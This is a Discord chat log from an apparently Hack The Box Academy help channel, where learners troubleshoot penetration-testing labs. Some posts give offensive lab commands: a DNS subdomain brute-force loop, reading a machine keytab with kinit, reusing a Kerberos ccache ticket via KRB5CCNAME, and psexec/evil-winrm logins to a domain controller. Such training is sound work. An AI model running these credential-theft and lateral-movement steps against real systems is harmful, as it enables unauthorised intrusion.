What is the name of the network interface that MTU is set to 1500? is the question im stuck on, i watched a video on how to do it and the answer is ens192 but on my pwnbox it comes up as eth0

next bronze
#

ssh into the target

mint otter
#

how

next bronze
#

ssh user@ip then enter the password

#

the section itself taught you how to do it, there's a whole paragraph on "Logging In via SSH"

mint otter
#

I dodnt read it lmao

#

I will now thank you

earnest mulch
mint otter
next bronze
#

is the ip correct?

mint otter
#

yes

next bronze
#

are using a vm or the in browser pwnbox

mint otter
#

browser

next bronze
#

works for me

#

just switch vpn server, you'll get a new box, also wrong channel, read #welcome to get verified

fringe urchin
#

was rConfig from Shells n payloads slow for other too? it takes 10 sec or more to even switch tabs. did the other section before with status.inlane and worked perfectly angry

next bronze
#

skill issue kappa

fringe urchin
next bronze
#

switch vpn servers maybe

frank vine
#

Anyone else having problems with ssh into labs? I'm using pwnbox in the browser on linux priv esc module

fringe urchin
#

did that aswell. no help. and the first time we met with the rConfig site it was insanly slow aswell.... maybe site issue?

next bronze
#

shruge maybe

mint otter
#

cus I haven't been

next bronze
#

no just user@ip and enter, then it will ask for password, just type it in even if you don't see it appear on screen

mint otter
#

it just freezes for like 1 min and then says connection timed out

frank vine
next bronze
#

reset both pwnbox and the target then

mint otter
#

I already have and it did the same

frank vine
#

Yea me too, I think there must be a problem because some other people are having issues with vpn

brazen saffron
#

I tried to combine the forbidden case with char inj but all are "forbidden".

hexed python
#

if regular way didn't work then try that.

brazen saffron
#

I used it.

#

I think the prob comes from the wordlists from HTB.

#

I am looking at an article to have all extensions.

#

I got +600 shells extensions now.

#

Before only 72 with techs from the section.

hexed python
#

so you got it ?

brazen saffron
#

No...

#

I'll wait the end of the intruder and create a script.

hexed python
#

ok

#

keep in mind that consider double-reverse extensions mate

austere osprey
#

Hi guys, the target spawned for me but it doesn't respond, anyone with the same issue?

hexed python
#

same

plucky latch
#

Anybody complete the Windows Privesc module , SeImpersonate and SeAssignPrimaryToken section recently, cannot connect via mssqlclient.py , tried nmap and no open ports, almost like this section is broken

hexed python
plucky latch
fathom pendant
#

Just us-academy-[1,2,3]
And eu-academy-[1,2]

#

The pwnbox has region names

plucky latch
#

Thats what I meant, moved to Pwnbox and did West and Im g2g

fathom pendant
#

That's not the same as changing vpn regions

plucky latch
#

I used another Pwnbox region and it works now, that better?

rustic sage
#

Attacking common services > attacking ftp. I’ve scanned this six times there are no ftp ports open. Is there something wrong with this lab

soft cedar
#

I faced a similar problem.

rustic sage
#

I didn’t I’ve

#

Did twice

#

PITA

#

I’ve seen many people complain about this, what’s up with this lab?

#

5th time worked

patent oak
#

Hi guys, on attacking thick clients. Fatty-server.jar doesn't do anything when I run it. I'm assuming it should? I already had to backtrack because I messed up and it only let me download an empty file. This file is larger and can be decompiled so I guess its the right one this time. I did all the stuff to the end of module but then it wouldn't run. But yeah, it doesn't even run immediately after download. 🤷‍♂️

rustic sage
#

Is it thicker than a snicker?

plucky latch
#

Is it just me or has stability of labs been worse than usual lately

rustic sage
#

It’s terrible

#

Today at least it didn’t even show up ftp for the ftp lab until the 8th time now it’s slow as hell for a individual port scan

patent oak
#

Yes... That was the worst module so far.

rustic sage
#

This attacking ftp lab is so awful I have to reset it so many times

cedar yew
#

@next bronze i want to acces linux01 but every user status acces denied

fathom pendant
cedar yew
#

checking

brazen saffron
#

After 2 try of burp intruder due to the end of the lab 😭.

cedar yew
fathom pendant
#

Maybe the showcased tool can help you find it

solar grove
#

FOOTPRINTING
What is the FQDN of the host where the last octet ends with "x.x.x.203"?
HELP me pls

round sable
#

Hi, experiencing connectivity issues today to the windows "machines", both from vpn and pwnbox. Is it just me ?

solar grove
#

I tried them all and only 1 of them allows transfer @acoustic owl

acoustic owl
solar grove
#

@acoustic owl For example, from an address we found (vpn.internal.inlanefreight.htb) we will make a bruteforce attack again ?

acoustic owl
solar grove
#

@acoustic owl for sub in $(cat /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.ns.internal.inlanefreight.htb @10.129.14.128 | grep -v ';|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done
I tried all of them but no result

rustic sage
#

Attacking FTP from the attacking common services. I have reset this lab switch servers all types of things and for some reason, I am not able to get on the port 2121 anymore. This lab is most likely broke or something. Reached out to support and he just says “it works for me”, others in the prior chats have said it’s a known issue. What should I do?

heavy edge
#

try pwnbox

acoustic owl
solar grove
#

@acoustic owl I changed it to 5000 but I still can't find it ( for sub in $(cat /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt);do dig $sub.ns.internal.inlanefreight.htb @10.129.14.128 | grep -v ';|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done
) Is this part correct? sub.ns.internal.inlanefreight.htb

austere sandal
#

its half

half stag
#

hey guys, On module "Password Attacks", Section "Pass the Ticket (PtT) from Linux" the very first question says " SSH to 10.129.23.109 with user "david@inlanefreight.htb" and password "Password2"
Connect to the target machine using SSH to the port TCP/2222 and the provided credentials. Read the flag in David's home directory." I added inlanefreight.htb to my /etc/hosts but when trying to ssh it says "permission denied."

rustic sage
#

Spoiler

#

🙃

placid edge
#

is there a way to see how much cubes you get from completing a module?

strange panther
#

Anyone who has done ATTACKING COMMON APPLICATIONS on Academy do you know if it includes a section on phpmyadmin? it comes up in the website search but doesn't mention it in the brief/description

rustic sage
#

Yes check your profile

cloud urchin
brazen saffron
#

No wait I think I found it.

cloud urchin
#

nice

brazen saffron
#

Not sure but my script returned more that one line "Testing $filename".

topaz sable
#

Guys I can't filter modules based on tiers.

#

Is there a path for beginner?

cloud urchin
#

the modules are individual lessons, not paths, you need to go to the paths section for that i think

topaz sable
#

I'm using from phone btw?

#

Can I sort by tier in laptop

cloud urchin
#

yeah

#

the search and sort functions on htb are great

topaz sable
#

Is there a beginner path?

fathom pendant
#

Yes

#

If you look under the "paths" section there's the Information Security Fundamentals path

topaz sable
#

Should I do hackthebox academy or do try hack me for a while and return to htba

fathom pendant
#

Htba will be better

#

It actually mostly is explaining things and giving you a lab to practice on

topaz sable
#

Will I be doing actual htb labs at the end of a path or something?

cloud urchin
#

every module you have hands on practice and a test to ensure you've learned the lesson

topaz sable
#

Is the info in the lesson correct? I read that sometimes they give misinformation and stuff

cedar yew
cloud urchin
fathom pendant
topaz sable
#

Also I read that the labs sometimes are very hard and out of syllabus for the lesson they just taught.

topaz sable
cedar yew
cloud urchin
#

pentesting is not easy

fathom pendant
topaz sable
fathom pendant
#

It's generally always been in a good state for knowledge

fathom pendant
#

It's on the linux01 machine you're on

topaz sable
fathom pendant
topaz sable
fathom pendant
#

The module and sections prepare you for the labs

cosmic obsidian
#

sudo smbclient -U david \\10.129.192.47\david -t 60
[sudo] password for murali:
Password for [WORKGROUP\david]:
Try "help" to get a list of possible commands.
smb: > ls
. D 0 Fri Feb 11 16:13:03 2022
.. D 0 Fri Feb 11 16:13:03 2022
Backup.vhd A 136315392 Fri Feb 11 17:46:12 2022

    10328063 blocks of size 4096. 6119444 blocks available

smb: > get Backup.vhd
parallel_read returned NT_STATUS_IO_TIMEOUT
smb: > getting file \Backup.vhd of size 136315392 as Backup.vhd SMBecho failed (NT_STATUS_INVALID_NETWORK_RESPONSE). The connection is disconnected now
I am unable to download the file any help?

cosmic obsidian
fathom pendant
fathom pendant
cosmic obsidian
fathom pendant
#

Also why are you adding -t 60

cosmic obsidian
#

i thought that it is beacuse of timeout so i increased the timeout with that

fathom pendant
#

The error you're getting btw is a connection error

cedar yew
fathom pendant
topaz sable
fathom pendant
topaz sable
#

Ok

fathom pendant
cedar yew
#

linikatz..

#

understand

fathom pendant
cedar yew
fathom pendant
#

The username is david@inlanefreight.htb

half stag
heavy edge
#

so

#

i prefer to use evo email rather than cli for the smtp stuff is that a no no

fathom pendant
#

But it's better to learn the CLI stuff

#

And once you learn CLI, the GUI will seem dumb

cedar yew
#

why not working

fathom pendant
#

Perhaps there's others

cedar yew
#

this command its true?
kinit linux01@inlanefreight.htb -k -t /etc/krb5.keytab

#

bcs no accepted format

fathom pendant
#

I didn't use that file

heavy edge
#

yeah thats the wrong file

fathom pendant
#

Also it would be linux01$

cedar yew
#

oh understand wrong file

#

I thought it was correct when I saw Linux 01 ntlm or something like that in this file.

fathom pendant
#

Well, it's not

topaz sable
#

Guys. To unlock one tier 3 module I need 50usd. Isn't that expensive af? 😮😮

fathom pendant
#

It's cheaper if you do a monthly subscription

#

Also, I wouldn't worry about t3 until you get the basics

winter blaze
#

Hi can someone please help me here >Log in to the ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL Domain Controller using the Domain Admin account password submitted for question #2 and submit the contents of the flag.txt file on the Administrator desktop. < || i tried psexec.py FREIGHTLOGISTICS.LOCAL/sapxxx@ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -target-ip 172.16.5.xxx with password Pxxxxsso and i tried evilwinrm as well ||

#

and i have connection vv,:

fathom pendant
winter blaze
#

yes it is

#

ill delete them

fathom pendant
#

Is it in there as both DC03 and the fqdn?

winter blaze
#

yes sr

fathom pendant
#

No it's not

#

You just have the FQDN in there

#

Also you should use the DOMAIN/USER for the account

winter blaze
#

okay thank you

lament zealot
#

Hi everyone nice to be in this group! i have an issue getting started with my first module on hackthebox. When i connect the openvpn on my virtualbox kali i get a notification saying successful (also on the website) but when i ping the ipadress it pings endlessly in a loop. How can i fix this? Does anyone know. Thanks for all the help

marsh flax
#

Hi, I want to know what is the best way starting off with knocking the boxes from intermediate to advanced ?

fathom pendant
#

Unless specified

compact patrolBOT
lament zealot
dim wolf
#

yeah then the ping command will continue until you send a command break

lament zealot
fathom pendant
#

You can do -c 5 I believe to only have it ping 5 times

lament zealot
lament zealot
marsh flax
#

thanks a lot @fathom pendant

dim wolf
#

by chance, are you using macOS as your host OS

fathom pendant
#

But it could be that your keyboard is a different layout, so you'd need to change in settings

lament zealot
dim wolf
#

ok

fathom pendant
#

Cmd isn't a windows key

dim wolf
#

Ctrl+C should command break then

lament zealot
fathom pendant
#

It sounds like you can type fine so it might not be a layout issue

#

Just a user error

lament zealot
dim wolf
#

hm

fathom pendant
lament zealot
fathom pendant
#

The right key is the host escape key in virtualbox

lament zealot
#

Just to clarify by command key “ctrl” is meant right?

dim wolf
#

i don't know much about VirtualBox so i can't say for certain

fathom pendant
#

Yes

lament zealot
#

I have a german keyboard layout so i have to translate sometimes to be sure

lament zealot
fathom pendant
#

You'll have to look up and Google settings that work

lament zealot
fathom pendant
#

You can remap the host escape key in virtualbox I believe

lament zealot
fathom pendant
#

Yeah that might be needing to go into the keyboard settings in your vm and changing it to a German keyboard layoit

#

Here's a list of many ways

lament zealot
#

I have a further question with the general usage. I tried the introductory problem “meow”. And generally everything was fine in the beginning until i hit “submit root flag”. While i dont want you to spoiler me the result itself i am curious do i need to use the terminal to get my answer or is it all within the app/website? (Kinda how i got to the whole pinging and command topic in the first place)

fathom pendant
#

Pinging just tells you a host is up

#

You need to scan, enumerate, and exploit your way through the system

lament zealot
fathom pendant
lament zealot
fathom pendant
#

Via the linux vm you're using

fathom pendant
#

If there's a webpage running, you can use a browser to see it

lament zealot
#

Gotcha

fathom pendant
#

The starting point machines all have walk-throughs to help guide you

#

The root flag is the flag found at /root/flag.txt usually

lament zealot
#

Yeah i’m not quite getting the same results as the walkthrough so i’m spending some extra time figuring out what i did wrong

fathom pendant
#

You might not

#

As the walk-through might be using older versions of tools

#

So tool output may differ

lament zealot
#

Ah ok thats good to know

fathom pendant
#

We're straying off-topic for the channel

#

Read and follow #welcome to access more of the server

lament zealot
#

Thank you so much for your time and effort to help me out it has been very useful to me!

half stag
#

could someone help me with "Password Attacks" section "Pass the Ticket (PtT) from Linux"

fathom pendant
half stag
#

This Question "Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio."

fathom pendant
#

Yes but what are you having issues with

#

That's just restating the question

half stag
#

there was the a cacche file in the /tmp folder, i tried using it like export KRB5CCNAME= but it doesnt worek

fathom pendant
#

The section goes over importing tickets and such

#

Is it expired?

half stag
#

doesnt work

fathom pendant
#

There are multiple ccache files

half stag
#

i tried all three of them

#

none worked

fathom pendant
#

That sounds odd bc one should work

#

And you did export KRB5CCNAME=/path/to/file?

half stag
#

yea

#

it says this "gensec_spnego_client_negTokenInit_step: gse_krb5: creating NEG_TOKEN_INIT for cifs/DC01 failed (next[(null)]): NT_STATUS_INVALID_PARAMETER
session setup failed: NT_STATUS_INVALID_PARAMETER"

heavy edge
#

common services easy box. i need a nudge for initial user foothold

#

i cant anon into ftp, and user-enum wont find anything. not sure if i am doing something wrong

#

also hydra wont crack anything

half stag
#

humangod i need help again\

soft cedar
proud sequoia
#

Anyone know how to open the docx file on medium skill assessment on password attacks module? Can’t install libre on the parrot os jump

half stag
#

This Question "Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio."

#

there was the a cacche file in the /tmp folder, i tried using it like export KRB5CCNAME= but it doesnt worek

soft cedar
heavy edge
#

i cant even find the initial user

proud sequoia
fathom pendant
heavy edge
#

on user-enum?

half stag
#

i tried all of the cacche files

soft cedar
#

and none of them worked?

heavy edge
half stag
soft cedar
half stag
heavy edge
#

waiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiit a second..... am i supposed to use the password file i got in teh very first section not the one that was provided

soft cedar
half stag
soft cedar
#

alright so try impersonating them now,

half stag
#

they dont work

half stag
#

should i get the ntlm hash and then crack it?

soft cedar
#

how are you importing the ccache?

fathom pendant
half stag
#

export KRB5CCNAME=/tmp/krb5cc_64740###########

valid viper
#

I am stuck on the footprinting module, DNS portion:

Identify if its possible to perform a zone transfer and submit the TXT record as the answer. (Format: HTB{...))

fathom pendant
fathom pendant
half stag
#

i tried both of them

fathom pendant
fathom pendant
valid viper
#

With this command? dig axfr inlanefreight.htb @10.129.14.128

cedar star
fathom pendant
half stag
#

could i dm you?

fathom pendant
#

dig <subdomain>.inlanefreight.htb @ip

valid viper
#

Am I supposed to bruteforce for the subdomain w/GoBuster etc...?

fathom pendant
#

so that's how you'd zone transfer deeper

soft cedar
soft cedar
#

not sure it will help, but its worth a try/

fathom pendant
#

you should be able to do a regular zone transfer and get a bunch of results

fathom pendant
#

the first i tried was expired (of course) but the second worked fine

valid viper
#

?

soft cedar
#

I would reset then if you think you are doing everything right.

uneven oracle
#

Can someone please help me with this math, or is it a typo?
128 to 191 is 63, not 64, right?
How are they getting 64 total subnets?

valid viper
#

; <<>> DiG 9.18.24-1-Debian <<>> ns.inlanefreight.htb 10.129.85.160
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 5418
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
;; QUESTION SECTION:
;ns.inlanefreight.htb.        IN    A

;; AUTHORITY SECTION:
.            460    IN    SOA    a.root-servers.net. nstld.verisign-grs.com. 2024040302 1800 900 604800 86400

;; Query time: 110 msec
;; SERVER: 192.168.12.1#53(192.168.12.1) (UDP)
;; WHEN: Wed Apr 03 13:42:14 MDT 2024
;; MSG SIZE  rcvd: 124

;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 60330
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
;; QUESTION SECTION:
;10.129.85.160.            IN    A

;; AUTHORITY SECTION:
.            460    IN    SOA    a.root-servers.net. nstld.verisign-grs.com. 2024040302 1800 900 604800 86400

;; Query time: 106 msec
;; SERVER: 192.168.12.1#53(192.168.12.1) (UDP)
;; WHEN: Wed Apr 03 13:42:14 MDT 2024
;; MSG SIZE  rcvd: 117
#

I don't see a TXT record in this output to submit for the answer?

fathom pendant
#

there's also another 127.0.0.1 on the initial dig

valid viper
#

ns.inlanefreight.htb. 604800 IN A 127.0.0.1

fathom pendant
#

there's another

#

dig axfr inlanefreight.htb @ip

valid viper
#

That's all there is.

uneven oracle
fathom pendant
fathom pendant
#

add 1 more

uneven oracle
valid viper
#

Of all the things to be so confusing...DNS.

fathom pendant
valid viper
#

internal.inlanefreight.htb. 604800 IN A 10.129.1.6
mail1.inlanefreight.htb. 604800 IN A 10.129.18.201
ns.inlanefreight.htb. 604800 IN A 127.0.0.1

#

This is the only record under 127.0.0.1

#

I've reset it, same result.

#

dig axfr inlanefreight.htb @10.129.176.117

fathom pendant
#

wait maybe i'm misremembering this part hold on

valid viper
#

Sure.

fathom pendant
#

yeah sorry i'm mixing this up with something else

#

but just try all the subdomains in that list

#

surely one of them has what you're looking for

valid viper
#

I'll skip the section and move on.

#

Thanks.

crystal sorrel
#

How do you get root kali in kali Linux

dim wolf
fathom pendant
dim wolf
#

su -

fathom pendant
#

it literally takes a few seconds to do

#

and the last question just requires you to use the shown tool on the section

fathom pendant
cedar yew
#

i dont find file

#

really

crystal sorrel
#

How do I get root kali in kali Linux

dim wolf
#

this also isn't the place to be asking.

acoustic owl
fathom pendant
#

the domain daemon has to connect to the domain somehow

#

maybe check it's files

bright spire
#

Doing linux fundamentals, having an issue with the find section. I believe my command is correct as it's trying to find, but it's giving me permission denied on every folder so I can't get any info. What am I doing wrong?

#

||Here is the command I'm running: find / -type f -name *.conf -size +25k -newermt 20202-03-03 -exec ls -al {} ;||

dim wolf
#

there are some directories that you don't have permission to read so you'll get permission denied on those

#

which is why you add 2>/dev/null at the end of the command to output stderr to null

#

that way you won't see a whole bunch of errors

bright spire
#

i've done that, but it gives no info at that point because its all error

dim wolf
#

have you checked the date that you put for the command?

bright spire
#

omg lol. let me try that...

fathom pendant
bright spire
#

I'm officially a dumb ass, thank you @dim wolf

dim wolf
#

we've all been there

bright spire
fathom pendant
#

lol

#

gotta be sure

bright spire
#

Appreciate you guys. Stoked to get these skills under my belt, such a fascinating field.

valid viper
fathom pendant
valid viper
#

Well, step 1 is admitting fault.

fathom pendant
#

lots of things that you'll learn beyond that will challenge you

valid viper
#

Oh definitely, coding is a lot worse.

#

But I refuse to be ignorant.

fathom pendant
#

CBBH path?

#

or CPTS?

valid viper
#

Already completed that.

fathom pendant
#

CPTS doesn't really deal with coding

valid viper
#

I did CBBH.

#

Now doing CPTS.

heavy edge
#

ugh i need another nudge i got into the db and im guessing i have to load file but what file

valid viper
#

I'm learning how to code on my own, data structures and algorithms in Python.

heavy edge
#

its either an sql injection or im stupid

fathom pendant
#

i think you're overthinking it

valid viper
#

HTB is a lot better than OffSec, I've learned a ton 🙂

valid viper
heavy edge
fathom pendant
#

also; don't just immediately rush to the discord when you need help

#

try and first walk through the problem in your head

#

and work through issues

#

it's fine to get stuck and need help

#

but it seems like you get stuck and immediately rush for help

valid viper
#

Marcie, it helps some of us to help others though. It helps me retain information anyway.

dim wolf
#

the suffering is necessary

valid viper
#

I disagree.

#

I mean sure, a bit but... Too much is gate keeping.

fathom pendant
#

And I'm not gatekeeping anything

valid viper
#

I didn't say you were.

fathom pendant
#

I'm assisting people in understanding the mindset that would be required for the exam

valid viper
#

An interesting take to be sure.

fathom pendant
#

The struggle is needed to improve

valid viper
#

At what point is the bird forced to fly?

fathom pendant
bright spire
#

True. I don't think you can rely on discord during your exam.

valid viper
#

Indeed...

fathom pendant
#

Outside help will get you and whomever help you banned, and certification revoked

dim wolf
#

you will retain information a lot more if you struggle to find that answer

valid viper
fathom pendant
#

@bright spire I will tell you, there's 2 ways

dim wolf
#

it means you understand what to look for and why something works that way

fathom pendant
#

Have you checked ftp for info?

valid viper
bright spire
#

I've learned that as well, I could be told something a million times and not retain it, but doing it hands on and problem-solving myself before relying on others retains it 99% of the time.

dim wolf
#

of course not but you don't just keep trying something that you know doesn't work, that's wasted effort

valid viper
dim wolf
#

you enumerate, you exhaust all your options, you enumerate again, you exhaust new options...

fathom pendant
#

Which is also why I don't believe in outright just giving someone the answer

valid viper
#

That's totally fair.

#

I just wanted the command to find the answer 😛

fathom pendant
#

Or pointing someone at the direct command for the answer

valid viper
#

But to your credit, I did get it 😉

dim wolf
#

only until you feel like you can't find anything new, you ask for help

fathom pendant
#

I just did the dns section off of what's given by the server and module section to at least sanity check

valid viper
#

Yeah. I don't like DNS :/

fathom pendant
#

So I can say, getting all the answers is possible with the provided tools

#

You might need a different wordlist for the last question of the section

#

But overall running the dnsemum command against the found subdomains then grepping for 203 until you find it works well

#

Either manually or a simple loop

hexed python
#

Hello, I have a troubleshoot problems here in Thick web-client application